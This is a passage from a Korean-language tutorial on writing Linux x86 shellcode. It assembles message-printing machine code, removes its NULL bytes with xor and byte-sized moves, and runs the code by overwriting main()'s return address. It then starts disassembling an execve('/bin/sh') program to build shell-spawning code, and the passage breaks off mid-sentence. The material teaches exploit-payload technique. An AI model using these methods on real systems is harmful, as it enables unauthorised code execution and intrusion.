&nbsp; &nbsp; 6f &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; outsl&nbsp; %ds:(%esi),(%dx) <br \/>8048457: &nbsp; &nbsp; &nbsp; 6f &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; outsl&nbsp; %ds:(%esi),(%dx) <br \/>8048458: &nbsp; &nbsp; &nbsp; 74 0a &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; je &nbsp; &nbsp; 8048464 &lt;__do_global_ctors_aux+0x4&gt; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : <br \/><br \/>\uc704\uc758 \ucf54\ub4dc\ub97c jmp(0x0804841c)\ubd80\ud130 call(0x080443e)\uae4c\uc9c0 \uc21c\uc11c\ub300\ub85c \uc815\ub82c\uc2dc\ucf1c \ubcf4\uba74 0xeb\\x20...&nbsp; <br \/>.... \\xff\\xff\\xff\uac00 \ub418\uba70 \uadf8\ub4a4\uc5d0 \\x49 ~ \\x0a\ub294 \ubb38\uc790\uc5f4\uc774\ubbc0\ub85c \uc9c1\uc811 \ubb38\uc790\ub97c \ucd94\uac00\ud558\uc5ec \uc791\uc131\ud558\uba74 <br \/>\uc544\ub798\uc640 \uac19\uc740 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \uc5bb\uc744\uc218 \uc788\ub2e4. <br \/><br \/>\uc774 code\ub97c \uc815\ub9ac\ud574\uc11c main()\uc758 ret\uc8fc\uc18c\uc5d0 \ub123\uc5b4 \uc2e4\ud589\ud574 \ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ cat test41.c <br \/>char print_code[] = <br \/>\"\\xeb\\x20\\x5e\\xb8\\x04\\x00\\x00\\x00\\xbb\\x01\\x00\\x00\\x00\\x89\\xf1\\xba\\x17\\x00\\x00\\x00\" <br \/>\"\\xcd\\x80\\xb8\\x01\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x00\\xcd\\x80\\xe8\\xdb\\xff\\xff\\xff\" <br \/>\"I'm willy in Null@Root\\n\"; <br \/><br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; int *ret; <br \/><br \/>&nbsp;&nbsp; ret = (int *)&amp;ret + 2; <br \/>&nbsp;&nbsp; (*ret) = (int)print_code; <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test41.c -o test41 <br \/>[willy@Null@Root]$ .\/test41 <br \/>I'm willy in Null@Root <br \/><br \/>\uc5ec\uae30\uae4c\uc9c0\ub294 \uc131\uacf5\ud588\ub2e4.. \uadf8\ub7fc \ubaa8\ub4e0\uac83\uc774 \ub05d\ub09c\uac83\uc77c\uae4c? 
print_code\ub97c \uc798 \ubcf4\uba74 \uc54c\uaca0\uc9c0\ub9cc code\uc911\uac04\uc5d0&nbsp; <br \/>NULL(0x00)\uc774 \ud3ec\ud568\ub418\uc5b4\uc788\ub294 \uac83\uc744 \ubcfc\uc218\uc788\ub2e4. \uc77c\ubc18\uc801\uc778 \uc785\ub825\uc778 \uacbd\uc6b0 buf\uc5d0 code\uc785\ub825\uc2dc \uc911\uac04\uc5d0 NULL\uc774 <br \/>\uc788\ub294 \uacbd\uc6b0 \ubb38\uc790\uc5f4\uc758 \ub05d\uc73c\ub85c \uc778\uc2dd\ud558\uc5ec \ub354\uc774\uc0c1 \ubc1b\uc9c0 \uc54a\uc744\uac83\uc774\ub2e4. \uc989 \uc804\uccb4\uc758 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \uc785\ub825\ud558\ub294&nbsp; <br \/>\uac83\uc774 \ubd88\uac00\ub2a5\ud574 \uc9c0\ubbc0\ub85c \uc5c6\uc560\uc57c \ud55c\ub2e4. NULL\uc744 \uc0ad\uc81c\ud558\ub294 \ubc29\ubc95\uc73c\ub85c\ub294 \uac19\uc740 \uae30\ub2a5\uc744 \ud558\ub294 \ub2e4\ub978 \uba85\ub839\uc5b4\ub85c <br \/>\ub300\uccb4 \uc0ac\uc6a9\ud558\uac70\ub098 \ucc98\ub9ac\ud558\ub294 data\ud06c\uae30\ub97c \ubcc0\uacbd\ud558\ub294 \ubc29\ubc95\uc774 \uc788\uc744\uc218 \uc788\ub2e4.&nbsp; \uc608\ub97c \ub4e4\uc5b4 %eax\uc5d0 0x00\uc744 <br \/>\ub123\uc5b4\uc57c \ud558\ub294 \uacbd\uc6b0 movl $0x00, %eax\ub300\uc2e0\uc5d0 xor %eax,%eax\uc640 \uac19\uc740 \ubc30\ud0c0\uc801 \ub17c\ub9ac\ub97c \uc774\uc6a9\ud558\uc5ec NULL\uc744&nbsp; <br \/>\ud53c\ud560\uc218 \uc788\uc73c\uba70, \uc791\uc740 \uc22b\uc790 0x10\uc744 \ub123\uc5b4\uc57c \ud560 \uacbd\uc6b0 movl $0x10, %eax\uc744 \uc4f0\uba74 4\ubc14\uc774\ud2b8\uc5d0 \uc4f0\uc5ec\uc9c0\uac8c \ub418\ubbc0\ub85c <br \/>0x00000010\uc774 \ub418\uc5b4 3\uac1c\uc758 NULL\uc774 \ub9cc\ub4e4\uc5b4\uc9c0\uac8c \ub418\ubbc0\ub85c movb $0x10,%al \uc774\ub807\uac8c \ud06c\uae30\ub97c \uc791\uac8c\ud574\uc11c \uacc4\uc0b0 <br \/>\ud558\uc5ec \ud53c\ud560\uc218 \uc788\ub2e4. <br \/><br \/>\uc790 \uadf8\ub7fc \uc5ec\uae30\uc11c Null\uc774 \ub098\ud0c0\ub098\uc9c0 \uc54a\ud1a0\ub85d \uc5b4\uc148\ube14\ub9ac \uba85\ub839\uc5b4\ub97c \uc218\uc815\ud574 \ubcf4\uc790. 
<br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/>&nbsp; | &nbsp; &nbsp; \uc218\uc815 \uc804 &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp; &nbsp; \uc218\uc815 \ud6c4 &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \uc124 &nbsp; &nbsp; \uba85 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/>&nbsp; | movl&nbsp; $0x04, %eax&nbsp; | xor &nbsp;&nbsp; %eax, %eax &nbsp; | xor \uc774\uc6a9 eax\ub97c 0x00000000\uc73c\ub85c \ub9cc\ub4e0\ub4a4&nbsp; | <br \/>&nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | movb &nbsp; $0x04, %al &nbsp; | \ub9c8\uc9c0\ub9c9 1\ubc14\uc774\ud2b8\uc5d0 0x04\ub97c \ub123\uc74c. &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/>&nbsp; | movl&nbsp; $0x01, %ebx&nbsp; | xor &nbsp;&nbsp; %ebx, %ebx &nbsp; | xor \uc774\uc6a9 ebx\ub97c 0x00000000\uc73c\ub85c \ub9cc\ub4e0\ub4a4&nbsp; | &nbsp; <br \/>&nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | movb &nbsp; $0x01, %bl &nbsp; | \ub9c8\uc9c0\ub9c9 1\ubc14\uc774\ud2b8\uc5d0 0x01\ub97c \ub123\uc74c. &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/>&nbsp; | movl&nbsp; $0x17, %edx&nbsp; | xor &nbsp;&nbsp; %edx, %edx &nbsp; | xor \uc774\uc6a9 edx\ub97c 0x00000000\uc73c\ub85c \ub9cc\ub4e0\ub4a4&nbsp; | <br \/>&nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | movb &nbsp; $0x17, %dl &nbsp; | \ub9c8\uc9c0\ub9c9 1\ubc14\uc774\ud2b8\uc5d0 0x17\ub97c \ub123\uc74c. 
&nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/>&nbsp; | movl&nbsp; $0x01, %eax&nbsp; | xor &nbsp;&nbsp; %eax, %eax &nbsp; | xor \uc774\uc6a9 eax\ub97c 0x00000000\uc73c\ub85c \ub9cc\ub4e0\ub4a4&nbsp; | <br \/>&nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | movb &nbsp; $0x01, %al &nbsp; | \ub9c8\uc9c0\ub9c9 1\ubc14\uc774\ud2b8\uc5d0 0x01\ub97c \ub123\uc74c. &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/>&nbsp; | movl&nbsp; $0x00, %ebx&nbsp; | xor &nbsp;&nbsp; %ebx, %ebx &nbsp; | xor %ebx %ebx\ub294 \ub450 \uac12\uc774 \uac19\uc740\uacbd\uc6b0 0\uc774\ub428| <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/><br \/>\uc774\ub807\uac8c \uc218\uc815\ud55c \ub0b4\uc6a9\uc744 test24.s\uc5d0 \ubc18\uc601\ud558\uc5ec \uc544\ub798\uc640 test25.s\uc640 \uac19\uc774 \ub9cc\ub4e4\uc218 \uc788\ub2e4. 
<br \/>[willy@Null@Root]$ cat test25.s <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; jmp &nbsp; &nbsp; strings <br \/>start:&nbsp; popl &nbsp;&nbsp; %esi <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %eax, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %ebx, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %edx, %edx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; $0x04, %al &nbsp; &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; $0x01, %bl &nbsp; &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esi,&nbsp; %ecx &nbsp;&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; $0x17, %dl &nbsp;&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; $0x01, %al &nbsp;&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %ebx, %ebx &nbsp;&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; <br \/>strings:call start <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \"I'm Willy in Null@Root\\n\"&nbsp; <br \/><br \/>[willy@Null@Root]$ gcc test25.s -o test25 <br \/>[willy@Null@Root]$ .\/test25 <br \/>I'm Willy in Null@Root <br \/><br \/>\ucef4\ud37c\uc77c\ud558\uc5ec \uc2e4\ud589\uacb0\uacfc \uc544\ubb34\ub7f0 \ubb38\uc81c\uac00 \uc5c6\ub294 \uac83\uc744 \ud655\uc778\ud558\uc600\uc73c\uba70 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \uc5bb\uae30\uc704\ud574 objdump\ub97c&nbsp; <br \/>\uc2e4\ud589\ud574 \ubcf4\uba74. 
<br \/><br \/>[willy@Null@Root]$ objdump -d test25 <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : &nbsp;&nbsp; <br \/>0804841c &lt;main&gt;: <br \/>804841c: &nbsp; &nbsp; &nbsp; eb 17 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jmp &nbsp;&nbsp; 8048435 &lt;strings&gt; <br \/><br \/>0804841e &lt;start&gt;: <br \/>804841e: &nbsp; &nbsp; &nbsp; 5e &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %esi <br \/>804841f: &nbsp; &nbsp; &nbsp; 31 c0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp;&nbsp; %eax,%eax <br \/>8048421: &nbsp; &nbsp; &nbsp; 31 db &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp;&nbsp; %ebx,%ebx <br \/>8048423: &nbsp; &nbsp; &nbsp; 31 d2 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp;&nbsp; %edx,%edx <br \/>8048425: &nbsp; &nbsp; &nbsp; b0 04 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; $0x4,%al <br \/>8048427: &nbsp; &nbsp; &nbsp; b3 01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; $0x1,%bl <br \/>8048429: &nbsp; &nbsp; &nbsp; 89 f1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; %esi,%ecx <br \/>804842b: &nbsp; &nbsp; &nbsp; b2 17 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; $0x17,%dl <br \/>804842d: &nbsp; &nbsp; &nbsp; cd 80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int &nbsp;&nbsp; $0x80 <br \/>804842f: &nbsp; &nbsp; &nbsp; b0 01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; $0x1,%al <br \/>8048431: &nbsp; &nbsp; &nbsp; 31 db &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp;&nbsp; %ebx,%ebx <br \/>8048433: &nbsp; &nbsp; &nbsp; cd 80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int &nbsp;&nbsp; $0x80 <br 
\/><br \/>08048435 &lt;strings&gt;: <br \/>8048435: &nbsp; &nbsp; &nbsp; e8 e4 ff ff ff &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; 804841e &lt;start&gt; <br \/>804843a: &nbsp; &nbsp; &nbsp; 49 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; dec &nbsp;&nbsp; %ecx <br \/>804843b: &nbsp; &nbsp; &nbsp; 27 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; daa &nbsp; &nbsp; <br \/>804843c: &nbsp; &nbsp; &nbsp; 6d &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; insl &nbsp; (%dx),%es:(%edi) <br \/>804843d: &nbsp; &nbsp; &nbsp; 20 57 69 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; and &nbsp;&nbsp; %dl,0x69(%edi) <br \/>8048440: &nbsp; &nbsp; &nbsp; 6c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; insb &nbsp; (%dx),%es:(%edi) <br \/>8048441: &nbsp; &nbsp; &nbsp; 6c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; insb &nbsp; (%dx),%es:(%edi) <br \/>8048442: &nbsp; &nbsp; &nbsp; 79 20 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jns &nbsp;&nbsp; 8048464 &lt;__do_global_ctors_aux+0x4&gt; <br \/>8048444: &nbsp; &nbsp; &nbsp; 69 6e 20 4e 75 6c 6c &nbsp;&nbsp; imul &nbsp; $0x6c6c754e,0x20(%esi),%ebp <br \/>804844b: &nbsp; &nbsp; &nbsp; 40 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; inc &nbsp;&nbsp; %eax <br \/>804844c: &nbsp; &nbsp; &nbsp; 52 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %edx <br \/>804844d: &nbsp; &nbsp; &nbsp; 6f &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; outsl&nbsp; %ds:(%esi),(%dx) <br \/>804844e: &nbsp; &nbsp; &nbsp; 6f &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; outsl&nbsp; %ds:(%esi),(%dx) <br \/>804844f: &nbsp; &nbsp; &nbsp; 74 0a &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; je &nbsp; &nbsp; 804845b &lt;strings+0x26&gt; <br \/>&nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : &nbsp; <br \/>\uc704\uc5d0 \ub098\ud0c0\ub09c \uacb0\uacfc\uc640 \uac19\uc774 \uae30\uacc4\uc5b4\ucf54\ub4dc\uc911\uc5d0 NULL \ucf54\ub4dc\uac00 \uc5c6\ub294 \uac83\uc744 \ud655\uc778\ud560\uc218 \uc788\ub2e4.&nbsp; \uc544\ub798 test42.c <br \/>\ub294 \uc704\uc5d0\uc11c \uc5bb\uc740 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c main()\uc758 ret\uc5d0 \ub123\uace0 \uc2e4\ud589\ud558\ub294 \ud504\ub85c\uadf8\ub7a8\uc774\ub2e4. <br \/><br \/>[willy@Null@Root]$ cat test42.c&nbsp; <br \/>char print_code[] = <br \/>\"\\xeb\\x17\\x5e\\x31\\xc0\\x31\\xdb\\x31\\xd2\\xb0\\x04\\xb3\\x01\\x89\\xf1\" <br \/>\"\\xb2\\x17\\xcd\\x80\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xe4\\xff\\xff\\xff\" <br \/>\"I'm willy in Null@Root\\n\"; <br \/><br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; int *ret; <br \/><br \/>&nbsp;&nbsp; ret = (int *)&amp;ret + 2; <br \/>&nbsp;&nbsp; (*ret) = (int)print_code; <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test42.c -o test42 <br \/>[willy@Null@Root]$ .\/test42 <br \/>I'm willy in Null@Root <br \/><br \/>\ubb38\uc81c\uc5c6\uc774 \uc798 \uc2e4\ud589\ub418\ub294 \uac83\uc744 \ubcfc\uc218 \uc788\ub2e4.&nbsp; \uc9c0\uae08\uae4c\uc9c0 Shellcode\ub9cc\ub4e4\uae30 \uc704\ud55c \uae30\ubcf8 \uc9c0\uc2dd\uc740 \ub2e4 \ubc30\uc6e0\ub2e4.&nbsp; <br \/>\ud2b9\ud788 system call\uac1c\ub150\uacfc \ubb38\uc790\uc5f4\uc758 \uc0c1\ub300\uc8fc\uc18c\ub97c \uad6c\ud558\ub294 \ubc29\ubc95\uc744 \uc774\ud574\ud558\uc600\ub2e4\uba74 Shellcode \ubfd0\ub9cc \uc544\ub2c8\ub77c <br \/>system call\uc744 \uc774\uc6a9\ud55c \uc2dc\uc2a4\ud15c\uc5d0 \uae30\ubcf8 \ub8e8\ud2f4(\ud568\uc218)\ub97c \uc218\ud589\ud558\ub294\ub370 \uc5b4\ub824\uc6c0\uc774 \uc5c6\uc744 \uac83\uc774\ub2e4.&nbsp; <br \/><br \/>&lt;shellcode \ub9cc\ub4e4\uae30&gt; <br \/>\uc774\uc81c \ubcf8\uaca9\uc801\uc73c\ub85c shellcode\ub97c \ub9cc\ub4dc\ub294 \uc791\uc5c5\uc744 \ud574\ubcf4\uc790. 
\uc77c\ubc18\uc801\uc73c\ub85c \uac00\uc7a5 \uac04\ub2e8\ud558\uac8c shell\uc744 \ub744\uc6b0\ub294 \ubc29\ubc95 <br \/>\uc5d0\ub294 system()\uc774\ub098 execve()\uc885\ub958\uc758 \ud568\uc218\ub97c \uc368\uc11c \ud504\ub85c\uadf8\ub7a8\uc744 \ub9cc\ub4e4\uc218 \uc788\ub2e4. \uadf8\uc911\uc5d0\uc11c system call\uc744&nbsp; <br \/>\ud560\uc218 \ud568\uc218\ub97c \/usr\/include\/asm\/unistd.h\uc5d0\uc11c \ucc3e\uc544\ubcf4\uba74 execve()\uc788\ub2e4. \uc774 \ud568\uc218\ub97c \uc774\uc6a9\ud558\uc5ec \uac04\ub2e8\ud55c&nbsp; <br \/>C\uc5b8\uc5b4 \ud504\ub85c\uadf8\ub7a8\uc744 \ub9cc\ub4e4\uc5b4 \ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ cat test51.c <br \/>main() <br \/>{ <br \/>&nbsp; char *name[2]; <br \/>&nbsp; name[0] = \"\/bin\/sh\"; <br \/>&nbsp; name[1] = NULL; <br \/>&nbsp; execve(name[0],name,NULL); <br \/>} <br \/><br \/>\uc774\ub807\uac8c \ub9cc\ub4e4\uc218 \uc788\uc73c\uba70 \uc774\uac83\uc744 -stack \uc635\uc158\uc744 \ucd94\uac00\ud574\uc11c \ucef4\ud37c\uc77c \ud55c\ub4a4 gdb\ub85c disassemble\ud574\uc11c \ub0b4\uc6a9\ub97c <br \/>\uc0b4\ud3b4\ubcf4\uba74 \uc704\uc5d0\uc11c \uc124\uba85\ud588\ub358 write() \ud568\uc218\ubcf4\ub2e4 \ub2e4\uc18c \ubcf5\uc7a1\ud55c \uad6c\uc870\uc784\uc744 \uc54c\uc218 \uc788\ub2e4.&nbsp; <br \/><br \/>[willy@Null@Root]$ gcc test51.c -o test51 -mpreferred-stack-boundary=2 -static <br \/><br \/>[willy@Null@Root]$ gdb -q test51 <br \/>(gdb) disassemble main <br \/>Dump of assembler code for function main: <br \/>0x80481dc &lt;main&gt;: &nbsp; &nbsp; &nbsp; push &nbsp; %ebp <br \/>0x80481dd &lt;main+1&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; %esp,%ebp <br \/>0x80481df &lt;main+3&gt;: &nbsp; &nbsp; sub &nbsp;&nbsp; $0x8,%esp <br \/>0x80481e2 &lt;main+6&gt;: &nbsp; &nbsp; movl &nbsp; $0x808b228,0xfffffff8(%ebp) <br \/>0x80481e9 &lt;main+13&gt;: &nbsp;&nbsp; movl &nbsp; $0x0,0xfffffffc(%ebp) <br \/>0x80481f0 &lt;main+20&gt;: &nbsp;&nbsp; push &nbsp; $0x0 <br \/>0x80481f2 &lt;main+22&gt;: &nbsp;&nbsp; lea &nbsp;&nbsp; 
0xfffffff8(%ebp),%eax <br \/>0x80481f5 &lt;main+25&gt;: &nbsp;&nbsp; push &nbsp; %eax <br \/>0x80481f6 &lt;main+26&gt;: &nbsp;&nbsp; pushl&nbsp; 0xfffffff8(%ebp) <br \/>0x80481f9 &lt;main+29&gt;: &nbsp;&nbsp; call &nbsp; 0x804c36c &lt;__execve&gt; <br \/>0x80481fe &lt;main+34&gt;: &nbsp;&nbsp; add &nbsp;&nbsp; $0xc,%esp <br \/>0x8048201 &lt;main+37&gt;: &nbsp;&nbsp; leave &nbsp; <br \/>0x8048202 &lt;main+38&gt;: &nbsp;&nbsp; ret &nbsp; &nbsp; <br \/>0x8048203 &lt;main+39&gt;: &nbsp;&nbsp; nop &nbsp; &nbsp; <br \/>End of assembler dump. <br \/>(gdb) disassemble __execve <br \/>Dump of assembler code for function __execve: <br \/>0x804c36c &lt;__execve&gt;: &nbsp; push &nbsp; %ebp <br \/>0x804c36d &lt;__execve+1&gt;: mov &nbsp;&nbsp; $0x0,%eax <br \/>0x804c372 &lt;__execve+6&gt;: mov &nbsp;&nbsp; %esp,%ebp <br \/>0x804c374 &lt;__execve+8&gt;: test &nbsp; %eax,%eax <br \/>0x804c376 &lt;__execve+10&gt;: &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %edi <br \/>0x804c377 &lt;__execve+11&gt;: &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %ebx <br \/>0x804c378 &lt;__execve+12&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0x8(%ebp),%edi <br \/>0x804c37b &lt;__execve+15&gt;: &nbsp; &nbsp; &nbsp;&nbsp; je &nbsp; &nbsp; 0x804c382 &lt;__execve+22&gt; <br \/>0x804c37d &lt;__execve+17&gt;: &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; 0x0 <br \/>0x804c382 &lt;__execve+22&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0xc(%ebp),%ecx <br \/>0x804c385 &lt;__execve+25&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0x10(%ebp),%edx <br \/>0x804c388 &lt;__execve+28&gt;: &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %ebx <br \/>0x804c389 &lt;__execve+29&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %edi,%ebx <br \/>0x804c38b &lt;__execve+31&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0xb,%eax <br \/>0x804c390 &lt;__execve+36&gt;: &nbsp; &nbsp; &nbsp;&nbsp; int &nbsp;&nbsp; $0x80 <br \/>0x804c392 &lt;__execve+38&gt;: &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %ebx <br \/>0x804c393 
&lt;__execve+39&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %eax,%ebx <br \/>0x804c395 &lt;__execve+41&gt;: &nbsp; &nbsp; &nbsp;&nbsp; cmp &nbsp;&nbsp; $0xfffff000,%ebx <br \/>0x804c39b &lt;__execve+47&gt;: &nbsp; &nbsp; &nbsp;&nbsp; jbe &nbsp;&nbsp; 0x804c3ab &lt;__execve+63&gt; <br \/>0x804c39d &lt;__execve+49&gt;: &nbsp; &nbsp; &nbsp;&nbsp; neg &nbsp;&nbsp; %ebx <br \/>0x804c39f &lt;__execve+51&gt;: &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; 0x80483b4 &lt;__errno_location&gt; <br \/>0x804c3a4 &lt;__execve+56&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %ebx,(%eax) <br \/>0x804c3a6 &lt;__execve+58&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0xffffffff,%ebx <br \/>0x804c3ab &lt;__execve+63&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %ebx,%eax <br \/>0x804c3ad &lt;__execve+65&gt;: &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %ebx <br \/>0x804c3ae &lt;__execve+66&gt;: &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %edi <br \/>0x804c3af &lt;__execve+67&gt;: &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %ebp <br \/>0x804c3b0 &lt;__execve+68&gt;: &nbsp; &nbsp; &nbsp;&nbsp; ret &nbsp; &nbsp; <br \/>End of assembler dump. <br \/><br \/>\uc6b0\ub9ac\uc758 \ubaa9\uc801\uc740 \uc704\uc758 disassemble \ub0b4\uc6a9\uc5d0\uc11c %eax,%ebx,%ecx,%edx... \uc5d0 \uc5b4\ub5a4 \uac12\ub4e4\uc774 \ub4e4\uc5b4\uac00\ub294\uc9c0\ub9cc <br \/>\uc54c\uc544\ub0bc\uc218 \uc788\uc73c\uba74 \ub41c\ub2e4. \ud558\ub098\uc529 \uc21c\uc11c\ub300\ub85c \ud6d1\uc5b4\ubcf4\uae30\ub85c \ud558\uc790.. \uba3c\uc800 main()\uc5d0\uc11c \uc778\uc218\uac00 \uc5b4\ub5bb\uac8c stack <br \/>\uc5d0 \ub4e4\uc5b4 \uac00\ub294\uc9c0 \ubcf4\uc790. <br \/><br \/>0x80481dc &lt;main&gt;: &nbsp; &nbsp; &nbsp; push &nbsp; %ebp <br \/>0x80481dd &lt;main+1&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; %esp,%ebp <br \/>\ud568\uc218\uc5d0 